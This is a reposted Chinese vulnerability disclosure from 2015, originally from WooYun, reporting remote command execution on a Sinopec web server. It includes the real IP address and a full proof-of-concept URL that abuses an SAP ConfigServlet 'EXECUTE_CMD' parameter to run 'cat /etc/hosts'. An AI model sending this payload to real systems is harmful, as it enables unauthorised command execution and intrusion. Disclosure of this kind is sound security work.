记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国石化某站远程命令执行漏洞(非Struts)

2015-02-22 19:00

执行cat /etc/hosts返回的结果



1.PNG

漏洞证明:

http://219.143.118.26/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/hosts

1.PNG



修复方案:

关注官方补丁,及时升级系统







声明:本人只做了简单的漏洞测试未进行深一步的测试。

知识来源: www.wooyun.org/bugs/wooyun-2015-090678

阅读:74407 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国石化某站远程命令执行漏洞(非Struts)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云